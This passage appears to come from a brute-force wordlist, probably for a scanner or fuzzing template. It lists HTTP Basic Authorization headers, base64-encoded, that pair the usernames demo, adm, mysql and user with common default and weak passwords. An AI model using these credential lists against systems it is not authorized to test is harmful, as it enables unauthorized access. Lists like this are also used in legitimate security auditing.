#demo:admin 852 | - "BASIC ZGVtbzphZG1pbiFA" #demo:admin!@ 853 | - "BASIC ZGVtbzphZG1pbjE=" #demo:admin1 854 | - "BASIC ZGVtbzphZG1pbjEy" #demo:admin12 855 | - "BASIC ZGVtbzphZG1pbjEyMw==" #demo:admin123 856 | - "BASIC ZGVtbzphZG1pbjEyMzQ1Ng==" #demo:admin123456 857 | - "BASIC ZGVtbzphZG1pbmlzdHJhdG9y" #demo:administrator 858 | - "BASIC ZGVtbzphbHBpbmU=" #demo:alpine 859 | - "BASIC 
ZGVtbzphc2QxMjM=" #demo:asd123 860 | - "BASIC ZGVtbzphc2Rm" #demo:asdf 861 | - "BASIC ZGVtbzphc2RmMTIzNA==" #demo:asdf1234 862 | - "BASIC ZGVtbzphc2RmZ2g=" #demo:asdfgh 863 | - "BASIC ZGVtbzpjZW50b3M=" #demo:centos 864 | - "BASIC ZGVtbzpjaGFuZ2VtZQ==" #demo:changeme 865 | - "BASIC ZGVtbzpjaXNjbw==" #demo:cisco 866 | - "BASIC ZGVtbzpjaXNjbzEyMw==" #demo:cisco123 867 | - "BASIC ZGVtbzpkZWZhdWx0" #demo:default 868 | - "BASIC ZGVtbzppZGMhQA==" #demo:idc!@ 869 | - "BASIC ZGVtbzpqaWFtaW1h" #demo:jiamima 870 | - "BASIC ZGVtbzpsZXRtZWlu" #demo:letmein 871 | - "BASIC ZGVtbzpsaW51eA==" #demo:linux 872 | - "BASIC ZGVtbzptYW5hZ2Vy" #demo:manager 873 | - "BASIC ZGVtbzptYXN0ZXI=" #demo:master 874 | - "BASIC ZGVtbzpvcmFjbGU=" #demo:oracle 875 | - "BASIC ZGVtbzpwQCQkdzByZA==" #demo:p@$$w0rd 876 | - "BASIC ZGVtbzpQQHNzdzByZA==" #demo:P@ssw0rd 877 | - "BASIC ZGVtbzpwQHNzdzByZA==" #demo:p@ssw0rd 878 | - "BASIC ZGVtbzpQQHNzdzByZCE=" #demo:P@ssw0rd! 879 | - "BASIC ZGVtbzpwQHNzd29yZA==" #demo:p@ssword 880 | - "BASIC ZGVtbzpwYTU1dzByZA==" #demo:pa55w0rd 881 | - "BASIC ZGVtbzpwYXNz" #demo:pass 882 | - "BASIC ZGVtbzpwYXNzdzByZA==" #demo:passw0rd 883 | - "BASIC ZGVtbzpwYXNzd29yZA==" #demo:password 884 | - "BASIC ZGVtbzpwYXNzd29yZDEyMw==" #demo:password123 885 | - "BASIC ZGVtbzpxMXcyZTM=" #demo:q1w2e3 886 | - "BASIC ZGVtbzpxMXcyZTNyNA==" #demo:q1w2e3r4 887 | - "BASIC ZGVtbzpxMXcyZTNyNHQ1" #demo:q1w2e3r4t5 888 | - "BASIC ZGVtbzpxYXp3c3hlZGM=" #demo:qazwsxedc 889 | - "BASIC ZGVtbzpxd2UxMjM=" #demo:qwe123 890 | - "BASIC ZGVtbzpxd2VyMTIzNA==" #demo:qwer1234 891 | - "BASIC ZGVtbzpxd2VydHk=" #demo:qwerty 892 | - "BASIC ZGVtbzpxd2VydHkxMjM=" #demo:qwerty123 893 | - "BASIC ZGVtbzpyZWRoYXQ=" #demo:redhat 894 | - "BASIC ZGVtbzpyb290" #demo:root 895 | - "BASIC ZGVtbzpyb290MTIz" #demo:root123 896 | - "BASIC ZGVtbzpyb290MTIzNA==" #demo:root1234 897 | - "BASIC ZGVtbzpyb290QDEyMw==" #demo:root@123 898 | - "BASIC ZGVtbzpyb290cm9vdA==" #demo:rootroot 899 | - "BASIC ZGVtbzpzZXJ2ZXI=" #demo:server 900 | - 
"BASIC ZGVtbzpzdXBlcnVzZXI=" #demo:superuser 901 | - "BASIC ZGVtbzpzeXN0ZW0=" #demo:system 902 | - "BASIC ZGVtbzpUZXN0" #demo:Test 903 | - "BASIC ZGVtbzp0ZXN0" #demo:test 904 | - "BASIC ZGVtbzp0ZXN0MTIz" #demo:test123 905 | - "BASIC ZGVtbzp0b29y" #demo:toor 906 | - "BASIC ZGVtbzp1Ym50" #demo:ubnt 907 | - "BASIC ZGVtbzp1YnVudHU=" #demo:ubuntu 908 | - "BASIC ZGVtbzpVc2Vy" #demo:User 909 | - "BASIC ZGVtbzp1c2Vy" #demo:user 910 | - "BASIC ZGVtbzp2bXdhcmU=" #demo:vmware 911 | - "BASIC ZGVtbzp3ZWxjb21l" #demo:welcome 912 | - "BASIC ZGVtbzp3dWJhbw==" #demo:wubao 913 | - "BASIC ZGVtbzp6YXExMndzeA==" #demo:zaq12wsx 914 | - "BASIC ZGVtbzp6eGN2Ym4=" #demo:zxcvbn 915 | - "BASIC ZGVtbzp6eGN2Ym5t" #demo:zxcvbnm 916 | - "BASIC ZGVtbzpjaGFuZ2VpdA==" #demo:changeit 917 | - "BASIC YWRtOg==" #adm: 918 | - "BASIC YWRtOiFRQVoyd3N4" #adm:!QAZ2wsx 919 | - "BASIC YWRtOiFxYXpAd3N4" #adm:!qaz@wsx 920 | - "BASIC YWRtOjAwMDA=" #adm:0000 921 | - "BASIC YWRtOjAwMDAwMA==" #adm:000000 922 | - "BASIC YWRtOjAwMDAwMDA=" #adm:0000000 923 | - "BASIC YWRtOjAwMDAwMDAw" #adm:00000000 924 | - "BASIC YWRtOjA5ODc2NTQzMjE=" #adm:0987654321 925 | - "BASIC YWRtOjA=" #adm:0 926 | - "BASIC YWRtOjE=" #adm:1 927 | - "BASIC YWRtOjI=" #adm:2 928 | - "BASIC YWRtOjM=" #adm:3 929 | - "BASIC YWRtOjQ=" #adm:4 930 | - "BASIC YWRtOjU=" #adm:5 931 | - "BASIC YWRtOjY=" #adm:6 932 | - "BASIC YWRtOjc=" #adm:7 933 | - "BASIC YWRtOjg=" #adm:8 934 | - "BASIC YWRtOjk=" #adm:9 935 | - "BASIC YWRtOjExMTE=" #adm:1111 936 | - "BASIC YWRtOjExMTEx" #adm:11111 937 | - "BASIC YWRtOjExMTExMQ==" #adm:111111 938 | - "BASIC YWRtOjExMTExMTE=" #adm:1111111 939 | - "BASIC YWRtOjExMTExMTEx" #adm:11111111 940 | - "BASIC YWRtOjExMjIzMw==" #adm:112233 941 | - "BASIC YWRtOjEyMTIxMg==" #adm:121212 942 | - "BASIC YWRtOjEyMw==" #adm:123 943 | - "BASIC YWRtOjEyMzEyMw==" #adm:123123 944 | - "BASIC YWRtOjEyMzMyMQ==" #adm:123321 945 | - "BASIC YWRtOjEyMzQ=" #adm:1234 946 | - "BASIC YWRtOjEyMzQ1" #adm:12345 947 | - "BASIC YWRtOjEyMzQ1Ng==" #adm:123456 948 | 
- "BASIC YWRtOjEyMzQ1Njc=" #adm:1234567 949 | - "BASIC YWRtOjEyMzQ1Njc4" #adm:12345678 950 | - "BASIC YWRtOjEyMzQ1Njc4OQ==" #adm:123456789 951 | - "BASIC YWRtOjEyMzQ1Njc4OTA=" #adm:1234567890 952 | - "BASIC YWRtOjEyMzRhYmNk" #adm:1234abcd 953 | - "BASIC YWRtOjEyMzRxd2Vy" #adm:1234qwer 954 | - "BASIC YWRtOjEyM2FiYw==" #adm:123abc 955 | - "BASIC YWRtOjEyM2FzZA==" #adm:123asd 956 | - "BASIC YWRtOjEyM3F3ZQ==" #adm:123qwe 957 | - "BASIC YWRtOjEyM3F3ZWFzZA==" #adm:123qweasd 958 | - "BASIC YWRtOjEycXdhc3p4" #adm:12qwaszx 959 | - "BASIC YWRtOjFlMmUzZQ==" #adm:1e2e3e 960 | - "BASIC YWRtOjFlMmUzZTRl" #adm:1e2e3e4e 961 | - "BASIC YWRtOjFxMnEzcQ==" #adm:1q2q3q 962 | - "BASIC YWRtOjFxMnEzcTRx" #adm:1q2q3q4q 963 | - "BASIC YWRtOjFxMnczZQ==" #adm:1q2w3e 964 | - "BASIC YWRtOjFxMnczZTRy" #adm:1q2w3e4r 965 | - "BASIC YWRtOjFxMnczZTRyNXQ=" #adm:1q2w3e4r5t 966 | - "BASIC YWRtOjFxYXoyd3N4" #adm:1qaz2wsx 967 | - "BASIC YWRtOjFxYXoyd3N4M2VkYw==" #adm:1qaz2wsx3edc 968 | - "BASIC YWRtOjFxYXp4c3cy" #adm:1qazxsw2 969 | - "BASIC YWRtOjFxYXpYU1dA" #adm:1qazXSW@ 970 | - "BASIC YWRtOjF3MnEhV0BR" #adm:1w2q!W@Q 971 | - "BASIC YWRtOjF3Mnczdw==" #adm:1w2w3w 972 | - "BASIC YWRtOjF3MnczdzR3" #adm:1w2w3w4w 973 | - "BASIC YWRtOjU0MzIx" #adm:54321 974 | - "BASIC YWRtOjY1NDMyMQ==" #adm:654321 975 | - "BASIC YWRtOjg4ODg4OA==" #adm:888888 976 | - "BASIC YWRtOmE=" #adm:a 977 | - "BASIC YWRtOmFiYzEyMw==" #adm:abc123 978 | - "BASIC YWRtOmFiY2QxMjM0" #adm:abcd1234 979 | - "BASIC YWRtOkFkbWlu" #adm:Admin 980 | - "BASIC YWRtOmFkbWlu" #adm:admin 981 | - "BASIC YWRtOmFkbWluIUA=" #adm:admin!@ 982 | - "BASIC YWRtOmFkbWluMQ==" #adm:admin1 983 | - "BASIC YWRtOmFkbWluMTI=" #adm:admin12 984 | - "BASIC YWRtOmFkbWluMTIz" #adm:admin123 985 | - "BASIC YWRtOmFkbWluMTIzNDU2" #adm:admin123456 986 | - "BASIC YWRtOmFkbWluaXN0cmF0b3I=" #adm:administrator 987 | - "BASIC YWRtOmFscGluZQ==" #adm:alpine 988 | - "BASIC YWRtOmFzZDEyMw==" #adm:asd123 989 | - "BASIC YWRtOmFzZGY=" #adm:asdf 990 | - "BASIC YWRtOmFzZGYxMjM0" #adm:asdf1234 991 
| - "BASIC YWRtOmFzZGZnaA==" #adm:asdfgh 992 | - "BASIC YWRtOmNlbnRvcw==" #adm:centos 993 | - "BASIC YWRtOmNoYW5nZW1l" #adm:changeme 994 | - "BASIC YWRtOmNpc2Nv" #adm:cisco 995 | - "BASIC YWRtOmNpc2NvMTIz" #adm:cisco123 996 | - "BASIC YWRtOmRlZmF1bHQ=" #adm:default 997 | - "BASIC YWRtOmlkYyFA" #adm:idc!@ 998 | - "BASIC YWRtOmppYW1pbWE=" #adm:jiamima 999 | - "BASIC YWRtOmxldG1laW4=" #adm:letmein 1000 | - "BASIC YWRtOmxpbnV4" #adm:linux 1001 | - "BASIC YWRtOm1hbmFnZXI=" #adm:manager 1002 | - "BASIC YWRtOm1hc3Rlcg==" #adm:master 1003 | - "BASIC YWRtOm9yYWNsZQ==" #adm:oracle 1004 | - "BASIC YWRtOnBAJCR3MHJk" #adm:p@$$w0rd 1005 | - "BASIC YWRtOlBAc3N3MHJk" #adm:P@ssw0rd 1006 | - "BASIC YWRtOnBAc3N3MHJk" #adm:p@ssw0rd 1007 | - "BASIC YWRtOlBAc3N3MHJkIQ==" #adm:P@ssw0rd! 1008 | - "BASIC YWRtOnBAc3N3b3Jk" #adm:p@ssword 1009 | - "BASIC YWRtOnBhNTV3MHJk" #adm:pa55w0rd 1010 | - "BASIC YWRtOnBhc3M=" #adm:pass 1011 | - "BASIC YWRtOnBhc3N3MHJk" #adm:passw0rd 1012 | - "BASIC YWRtOnBhc3N3b3Jk" #adm:password 1013 | - "BASIC YWRtOnBhc3N3b3JkMTIz" #adm:password123 1014 | - "BASIC YWRtOnExdzJlMw==" #adm:q1w2e3 1015 | - "BASIC YWRtOnExdzJlM3I0" #adm:q1w2e3r4 1016 | - "BASIC YWRtOnExdzJlM3I0dDU=" #adm:q1w2e3r4t5 1017 | - "BASIC YWRtOnFhendzeGVkYw==" #adm:qazwsxedc 1018 | - "BASIC YWRtOnF3ZTEyMw==" #adm:qwe123 1019 | - "BASIC YWRtOnF3ZXIxMjM0" #adm:qwer1234 1020 | - "BASIC YWRtOnF3ZXJ0eQ==" #adm:qwerty 1021 | - "BASIC YWRtOnF3ZXJ0eTEyMw==" #adm:qwerty123 1022 | - "BASIC YWRtOnJlZGhhdA==" #adm:redhat 1023 | - "BASIC YWRtOnJvb3Q=" #adm:root 1024 | - "BASIC YWRtOnJvb3QxMjM=" #adm:root123 1025 | - "BASIC YWRtOnJvb3QxMjM0" #adm:root1234 1026 | - "BASIC YWRtOnJvb3RAMTIz" #adm:root@123 1027 | - "BASIC YWRtOnJvb3Ryb290" #adm:rootroot 1028 | - "BASIC YWRtOnNlcnZlcg==" #adm:server 1029 | - "BASIC YWRtOnN1cGVydXNlcg==" #adm:superuser 1030 | - "BASIC YWRtOnN5c3RlbQ==" #adm:system 1031 | - "BASIC YWRtOlRlc3Q=" #adm:Test 1032 | - "BASIC YWRtOnRlc3Q=" #adm:test 1033 | - "BASIC YWRtOnRlc3QxMjM=" 
#adm:test123 1034 | - "BASIC YWRtOnRvb3I=" #adm:toor 1035 | - "BASIC YWRtOnVibnQ=" #adm:ubnt 1036 | - "BASIC YWRtOnVidW50dQ==" #adm:ubuntu 1037 | - "BASIC YWRtOlVzZXI=" #adm:User 1038 | - "BASIC YWRtOnVzZXI=" #adm:user 1039 | - "BASIC YWRtOnZtd2FyZQ==" #adm:vmware 1040 | - "BASIC YWRtOndlbGNvbWU=" #adm:welcome 1041 | - "BASIC YWRtOnd1YmFv" #adm:wubao 1042 | - "BASIC YWRtOnphcTEyd3N4" #adm:zaq12wsx 1043 | - "BASIC YWRtOnp4Y3Zibg==" #adm:zxcvbn 1044 | - "BASIC YWRtOnp4Y3Zibm0=" #adm:zxcvbnm 1045 | - "BASIC YWRtOmNoYW5nZWl0" #adm:changeit 1046 | - "BASIC bXlzcWw6" #mysql: 1047 | - "BASIC bXlzcWw6IVFBWjJ3c3g=" #mysql:!QAZ2wsx 1048 | - "BASIC bXlzcWw6IXFhekB3c3g=" #mysql:!qaz@wsx 1049 | - "BASIC bXlzcWw6MDAwMA==" #mysql:0000 1050 | - "BASIC bXlzcWw6MDAwMDAw" #mysql:000000 1051 | - "BASIC bXlzcWw6MDAwMDAwMA==" #mysql:0000000 1052 | - "BASIC bXlzcWw6MDAwMDAwMDA=" #mysql:00000000 1053 | - "BASIC bXlzcWw6MDk4NzY1NDMyMQ==" #mysql:0987654321 1054 | - "BASIC bXlzcWw6MA==" #mysql:0 1055 | - "BASIC bXlzcWw6MQ==" #mysql:1 1056 | - "BASIC bXlzcWw6Mg==" #mysql:2 1057 | - "BASIC bXlzcWw6Mw==" #mysql:3 1058 | - "BASIC bXlzcWw6NA==" #mysql:4 1059 | - "BASIC bXlzcWw6NQ==" #mysql:5 1060 | - "BASIC bXlzcWw6Ng==" #mysql:6 1061 | - "BASIC bXlzcWw6Nw==" #mysql:7 1062 | - "BASIC bXlzcWw6OA==" #mysql:8 1063 | - "BASIC bXlzcWw6OQ==" #mysql:9 1064 | - "BASIC bXlzcWw6MTExMQ==" #mysql:1111 1065 | - "BASIC bXlzcWw6MTExMTE=" #mysql:11111 1066 | - "BASIC bXlzcWw6MTExMTEx" #mysql:111111 1067 | - "BASIC bXlzcWw6MTExMTExMQ==" #mysql:1111111 1068 | - "BASIC bXlzcWw6MTExMTExMTE=" #mysql:11111111 1069 | - "BASIC bXlzcWw6MTEyMjMz" #mysql:112233 1070 | - "BASIC bXlzcWw6MTIxMjEy" #mysql:121212 1071 | - "BASIC bXlzcWw6MTIz" #mysql:123 1072 | - "BASIC bXlzcWw6MTIzMTIz" #mysql:123123 1073 | - "BASIC bXlzcWw6MTIzMzIx" #mysql:123321 1074 | - "BASIC bXlzcWw6MTIzNA==" #mysql:1234 1075 | - "BASIC bXlzcWw6MTIzNDU=" #mysql:12345 1076 | - "BASIC bXlzcWw6MTIzNDU2" #mysql:123456 1077 | - "BASIC bXlzcWw6MTIzNDU2Nw==" 
#mysql:1234567 1078 | - "BASIC bXlzcWw6MTIzNDU2Nzg=" #mysql:12345678 1079 | - "BASIC bXlzcWw6MTIzNDU2Nzg5" #mysql:123456789 1080 | - "BASIC bXlzcWw6MTIzNDU2Nzg5MA==" #mysql:1234567890 1081 | - "BASIC bXlzcWw6MTIzNGFiY2Q=" #mysql:1234abcd 1082 | - "BASIC bXlzcWw6MTIzNHF3ZXI=" #mysql:1234qwer 1083 | - "BASIC bXlzcWw6MTIzYWJj" #mysql:123abc 1084 | - "BASIC bXlzcWw6MTIzYXNk" #mysql:123asd 1085 | - "BASIC bXlzcWw6MTIzcXdl" #mysql:123qwe 1086 | - "BASIC bXlzcWw6MTIzcXdlYXNk" #mysql:123qweasd 1087 | - "BASIC bXlzcWw6MTJxd2Fzeng=" #mysql:12qwaszx 1088 | - "BASIC bXlzcWw6MWUyZTNl" #mysql:1e2e3e 1089 | - "BASIC bXlzcWw6MWUyZTNlNGU=" #mysql:1e2e3e4e 1090 | - "BASIC bXlzcWw6MXEycTNx" #mysql:1q2q3q 1091 | - "BASIC bXlzcWw6MXEycTNxNHE=" #mysql:1q2q3q4q 1092 | - "BASIC bXlzcWw6MXEydzNl" #mysql:1q2w3e 1093 | - "BASIC bXlzcWw6MXEydzNlNHI=" #mysql:1q2w3e4r 1094 | - "BASIC bXlzcWw6MXEydzNlNHI1dA==" #mysql:1q2w3e4r5t 1095 | - "BASIC bXlzcWw6MXFhejJ3c3g=" #mysql:1qaz2wsx 1096 | - "BASIC bXlzcWw6MXFhejJ3c3gzZWRj" #mysql:1qaz2wsx3edc 1097 | - "BASIC bXlzcWw6MXFhenhzdzI=" #mysql:1qazxsw2 1098 | - "BASIC bXlzcWw6MXFhelhTV0A=" #mysql:1qazXSW@ 1099 | - "BASIC bXlzcWw6MXcycSFXQFE=" #mysql:1w2q!W@Q 1100 | - "BASIC bXlzcWw6MXcydzN3" #mysql:1w2w3w 1101 | - "BASIC bXlzcWw6MXcydzN3NHc=" #mysql:1w2w3w4w 1102 | - "BASIC bXlzcWw6NTQzMjE=" #mysql:54321 1103 | - "BASIC bXlzcWw6NjU0MzIx" #mysql:654321 1104 | - "BASIC bXlzcWw6ODg4ODg4" #mysql:888888 1105 | - "BASIC bXlzcWw6YQ==" #mysql:a 1106 | - "BASIC bXlzcWw6YWJjMTIz" #mysql:abc123 1107 | - "BASIC bXlzcWw6YWJjZDEyMzQ=" #mysql:abcd1234 1108 | - "BASIC bXlzcWw6QWRtaW4=" #mysql:Admin 1109 | - "BASIC bXlzcWw6YWRtaW4=" #mysql:admin 1110 | - "BASIC bXlzcWw6YWRtaW4hQA==" #mysql:admin!@ 1111 | - "BASIC bXlzcWw6YWRtaW4x" #mysql:admin1 1112 | - "BASIC bXlzcWw6YWRtaW4xMg==" #mysql:admin12 1113 | - "BASIC bXlzcWw6YWRtaW4xMjM=" #mysql:admin123 1114 | - "BASIC bXlzcWw6YWRtaW4xMjM0NTY=" #mysql:admin123456 1115 | - "BASIC bXlzcWw6YWRtaW5pc3RyYXRvcg==" 
#mysql:administrator 1116 | - "BASIC bXlzcWw6YWxwaW5l" #mysql:alpine 1117 | - "BASIC bXlzcWw6YXNkMTIz" #mysql:asd123 1118 | - "BASIC bXlzcWw6YXNkZg==" #mysql:asdf 1119 | - "BASIC bXlzcWw6YXNkZjEyMzQ=" #mysql:asdf1234 1120 | - "BASIC bXlzcWw6YXNkZmdo" #mysql:asdfgh 1121 | - "BASIC bXlzcWw6Y2VudG9z" #mysql:centos 1122 | - "BASIC bXlzcWw6Y2hhbmdlbWU=" #mysql:changeme 1123 | - "BASIC bXlzcWw6Y2lzY28=" #mysql:cisco 1124 | - "BASIC bXlzcWw6Y2lzY28xMjM=" #mysql:cisco123 1125 | - "BASIC bXlzcWw6ZGVmYXVsdA==" #mysql:default 1126 | - "BASIC bXlzcWw6aWRjIUA=" #mysql:idc!@ 1127 | - "BASIC bXlzcWw6amlhbWltYQ==" #mysql:jiamima 1128 | - "BASIC bXlzcWw6bGV0bWVpbg==" #mysql:letmein 1129 | - "BASIC bXlzcWw6bGludXg=" #mysql:linux 1130 | - "BASIC bXlzcWw6bWFuYWdlcg==" #mysql:manager 1131 | - "BASIC bXlzcWw6bWFzdGVy" #mysql:master 1132 | - "BASIC bXlzcWw6b3JhY2xl" #mysql:oracle 1133 | - "BASIC bXlzcWw6cEAkJHcwcmQ=" #mysql:p@$$w0rd 1134 | - "BASIC bXlzcWw6UEBzc3cwcmQ=" #mysql:P@ssw0rd 1135 | - "BASIC bXlzcWw6cEBzc3cwcmQ=" #mysql:p@ssw0rd 1136 | - "BASIC bXlzcWw6UEBzc3cwcmQh" #mysql:P@ssw0rd! 
1137 | - "BASIC bXlzcWw6cEBzc3dvcmQ=" #mysql:p@ssword 1138 | - "BASIC bXlzcWw6cGE1NXcwcmQ=" #mysql:pa55w0rd 1139 | - "BASIC bXlzcWw6cGFzcw==" #mysql:pass 1140 | - "BASIC bXlzcWw6cGFzc3cwcmQ=" #mysql:passw0rd 1141 | - "BASIC bXlzcWw6cGFzc3dvcmQ=" #mysql:password 1142 | - "BASIC bXlzcWw6cGFzc3dvcmQxMjM=" #mysql:password123 1143 | - "BASIC bXlzcWw6cTF3MmUz" #mysql:q1w2e3 1144 | - "BASIC bXlzcWw6cTF3MmUzcjQ=" #mysql:q1w2e3r4 1145 | - "BASIC bXlzcWw6cTF3MmUzcjR0NQ==" #mysql:q1w2e3r4t5 1146 | - "BASIC bXlzcWw6cWF6d3N4ZWRj" #mysql:qazwsxedc 1147 | - "BASIC bXlzcWw6cXdlMTIz" #mysql:qwe123 1148 | - "BASIC bXlzcWw6cXdlcjEyMzQ=" #mysql:qwer1234 1149 | - "BASIC bXlzcWw6cXdlcnR5" #mysql:qwerty 1150 | - "BASIC bXlzcWw6cXdlcnR5MTIz" #mysql:qwerty123 1151 | - "BASIC bXlzcWw6cmVkaGF0" #mysql:redhat 1152 | - "BASIC bXlzcWw6cm9vdA==" #mysql:root 1153 | - "BASIC bXlzcWw6cm9vdDEyMw==" #mysql:root123 1154 | - "BASIC bXlzcWw6cm9vdDEyMzQ=" #mysql:root1234 1155 | - "BASIC bXlzcWw6cm9vdEAxMjM=" #mysql:root@123 1156 | - "BASIC bXlzcWw6cm9vdHJvb3Q=" #mysql:rootroot 1157 | - "BASIC bXlzcWw6c2VydmVy" #mysql:server 1158 | - "BASIC bXlzcWw6c3VwZXJ1c2Vy" #mysql:superuser 1159 | - "BASIC bXlzcWw6c3lzdGVt" #mysql:system 1160 | - "BASIC bXlzcWw6VGVzdA==" #mysql:Test 1161 | - "BASIC bXlzcWw6dGVzdA==" #mysql:test 1162 | - "BASIC bXlzcWw6dGVzdDEyMw==" #mysql:test123 1163 | - "BASIC bXlzcWw6dG9vcg==" #mysql:toor 1164 | - "BASIC bXlzcWw6dWJudA==" #mysql:ubnt 1165 | - "BASIC bXlzcWw6dWJ1bnR1" #mysql:ubuntu 1166 | - "BASIC bXlzcWw6VXNlcg==" #mysql:User 1167 | - "BASIC bXlzcWw6dXNlcg==" #mysql:user 1168 | - "BASIC bXlzcWw6dm13YXJl" #mysql:vmware 1169 | - "BASIC bXlzcWw6d2VsY29tZQ==" #mysql:welcome 1170 | - "BASIC bXlzcWw6d3ViYW8=" #mysql:wubao 1171 | - "BASIC bXlzcWw6emFxMTJ3c3g=" #mysql:zaq12wsx 1172 | - "BASIC bXlzcWw6enhjdmJu" #mysql:zxcvbn 1173 | - "BASIC bXlzcWw6enhjdmJubQ==" #mysql:zxcvbnm 1174 | - "BASIC bXlzcWw6Y2hhbmdlaXQ=" #mysql:changeit 1175 | - "BASIC dXNlcjo=" #user: 1176 | - "BASIC 
dXNlcjohUUFaMndzeA==" #user:!QAZ2wsx 1177 | - "BASIC dXNlcjohcWF6QHdzeA==" #user:!qaz@wsx 1178 | - "BASIC dXNlcjowMDAw" #user:0000 1179 | - "BASIC dXNlcjowMDAwMDA=" #user:000000 1180 | - "BASIC dXNlcjowMDAwMDAw" #user:0000000 1181 | - "BASIC dXNlcjowMDAwMDAwMA==" #user:00000000 1182 | - "BASIC dXNlcjowOTg3NjU0MzIx" #user:0987654321 1183 | - "BASIC dXNlcjow" #user:0 1184 | - "BASIC dXNlcjox" #user:1 1185 | - "BASIC dXNlcjoy" #user:2 1186 | - "BASIC dXNlcjoz" #user:3 1187 | - "BASIC dXNlcjo0" #user:4 1188 | - "BASIC dXNlcjo1" #user:5 1189 | - "BASIC dXNlcjo2" #user:6 1190 | - "BASIC dXNlcjo3" #user:7 1191 | - "BASIC dXNlcjo4" #user:8 1192 | - "BASIC dXNlcjo5" #user:9 1193 | - "BASIC dXNlcjoxMTEx" #user:1111 1194 | - "BASIC dXNlcjoxMTExMQ==" #user:11111 1195 | - "BASIC dXNlcjoxMTExMTE=" #user:111111 1196 | - "BASIC dXNlcjoxMTExMTEx" #user:1111111 1197 | - "BASIC dXNlcjoxMTExMTExMQ==" #user:11111111 1198 | - "BASIC dXNlcjoxMTIyMzM=" #user:112233 1199 | - "BASIC dXNlcjoxMjEyMTI=" #user:121212 1200 | - "BASIC dXNlcjoxMjM=" #user:123 1201 | - "BASIC dXNlcjoxMjMxMjM=" #user:123123 1202 | - "BASIC dXNlcjoxMjMzMjE=" #user:123321 1203 | - "BASIC dXNlcjoxMjM0" #user:1234 1204 | - "BASIC dXNlcjoxMjM0NQ==" #user:12345 1205 | - "BASIC dXNlcjoxMjM0NTY=" #user:123456 1206 | - "BASIC dXNlcjoxMjM0NTY3" #user:1234567 1207 | - "BASIC dXNlcjoxMjM0NTY3OA==" #user:12345678 1208 | - "BASIC dXNlcjoxMjM0NTY3ODk=" #user:123456789 1209 | - "BASIC dXNlcjoxMjM0NTY3ODkw" #user:1234567890 1210 | - "BASIC dXNlcjoxMjM0YWJjZA==" #user:1234abcd 1211 | - "BASIC dXNlcjoxMjM0cXdlcg==" #user:1234qwer 1212 | - "BASIC dXNlcjoxMjNhYmM=" #user:123abc 1213 | - "BASIC dXNlcjoxMjNhc2Q=" #user:123asd 1214 | - "BASIC dXNlcjoxMjNxd2U=" #user:123qwe 1215 | - "BASIC dXNlcjoxMjNxd2Vhc2Q=" #user:123qweasd 1216 | - "BASIC dXNlcjoxMnF3YXN6eA==" #user:12qwaszx 1217 | - "BASIC dXNlcjoxZTJlM2U=" #user:1e2e3e 1218 | - "BASIC dXNlcjoxZTJlM2U0ZQ==" #user:1e2e3e4e 1219 | - "BASIC dXNlcjoxcTJxM3E=" #user:1q2q3q 1220 | - "BASIC 
dXNlcjoxcTJxM3E0cQ==" #user:1q2q3q4q 1221 | - "BASIC dXNlcjoxcTJ3M2U=" #user:1q2w3e 1222 | - "BASIC dXNlcjoxcTJ3M2U0cg==" #user:1q2w3e4r 1223 | - "BASIC dXNlcjoxcTJ3M2U0cjV0" #user:1q2w3e4r5t 1224 | - "BASIC dXNlcjoxcWF6MndzeA==" #user:1qaz2wsx 1225 | - "BASIC dXNlcjoxcWF6MndzeDNlZGM=" #user:1qaz2wsx3edc 1226 | - "BASIC dXNlcjoxcWF6eHN3Mg==" #user:1qazxsw2 1227 | - "BASIC dXNlcjoxcWF6WFNXQA==" #user:1qazXSW@ 1228 | - "BASIC dXNlcjoxdzJxIVdAUQ==" #user:1w2q!W@Q 1229 | - "BASIC dXNlcjoxdzJ3M3c=" #user:1w2w3w 1230 | - "BASIC dXNlcjoxdzJ3M3c0dw==" #user:1w2w3w4w 1231 | - "BASIC dXNlcjo1NDMyMQ==" #user:54321 1232 | - "BASIC dXNlcjo2NTQzMjE=" #user:654321 1233 | - "BASIC dXNlcjo4ODg4ODg=" #user:888888 1234 | - "BASIC dXNlcjph" #user:a 1235 | - "BASIC dXNlcjphYmMxMjM=" #user:abc123 1236 | - "BASIC dXNlcjphYmNkMTIzNA==" #user:abcd1234 1237 | - "BASIC dXNlcjpBZG1pbg==" #user:Admin 1238 | - "BASIC dXNlcjphZG1pbg==" #user:admin 1239 | - "BASIC dXNlcjphZG1pbiFA" #user:admin!@ 1240 | - "BASIC dXNlcjphZG1pbjE=" #user:admin1 1241 | - "BASIC dXNlcjphZG1pbjEy" #user:admin12 1242 | - "BASIC dXNlcjphZG1pbjEyMw==" #user:admin123 1243 | - "BASIC dXNlcjphZG1pbjEyMzQ1Ng==" #user:admin123456 1244 | - "BASIC dXNlcjphZG1pbmlzdHJhdG9y" #user:administrator 1245 | - "BASIC dXNlcjphbHBpbmU=" #user:alpine 1246 | - "BASIC dXNlcjphc2QxMjM=" #user:asd123 1247 | - "BASIC dXNlcjphc2Rm" #user:asdf 1248 | - "BASIC dXNlcjphc2RmMTIzNA==" #user:asdf1234 1249 | - "BASIC dXNlcjphc2RmZ2g=" #user:asdfgh 1250 | - "BASIC dXNlcjpjZW50b3M=" #user:centos 1251 | - "BASIC dXNlcjpjaGFuZ2VtZQ==" #user:changeme 1252 | - "BASIC dXNlcjpjaXNjbw==" #user:cisco 1253 | - "BASIC dXNlcjpjaXNjbzEyMw==" #user:cisco123 1254 | - "BASIC dXNlcjpkZWZhdWx0" #user:default 1255 | - "BASIC dXNlcjppZGMhQA==" #user:idc!@ 1256 | - "BASIC dXNlcjpqaWFtaW1h" #user:jiamima 1257 | - "BASIC dXNlcjpsZXRtZWlu" #user:letmein 1258 | - "BASIC dXNlcjpsaW51eA==" #user:linux 1259 | - "BASIC dXNlcjptYW5hZ2Vy" #user:manager 1260 | - "BASIC 
